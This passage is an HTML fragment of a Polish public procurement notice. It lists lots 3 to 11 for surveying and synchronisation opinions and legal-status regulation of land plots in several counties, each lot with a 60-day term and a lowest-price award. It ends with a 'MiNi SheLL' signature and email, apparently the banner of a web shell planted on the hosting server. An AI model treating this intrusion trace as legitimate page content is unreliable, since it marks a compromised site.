<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wykonanie opinii synchronizacyjnej - teren pow. ostrowieckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie opinii synchronizacyjnej dla 1 działki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wykonanie opinii synchronizacyjnej - teren pow. kieleckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie opinii synchronizacyjnej dla 5 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> wykonanie opinii synchronizacyjnej - teren pow. pińczowskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie opinii synchronizacyjnej 1 działki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> wykonanie opinii synchronizacyjnej - teren pow. jędrzejowskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie opinii synchronizacyjnej 1 działki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> wykonanie opinii geodezyjnej - teren pow. jędrzejowskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie opinii geodezyjnej dla dawnego majątku ziemskiego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> wykonanie opinii geodezyjnej - teren pow. jędrzejowskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie opinii geodezyjnej dla dawnego majątku ziemskiego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> wykonanie opinii geodezyjnej - teren pow. lubaczowskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie opinii geodezyjnej 10 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> wykonanie opinii geodezyjnej - teren pow. jarosławskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie opinii geodezyjnej dla 6 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> regulacja stanu prawnego - teren pow. tarnobrzeskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie regulacji stanu prawnego 2 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.13.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com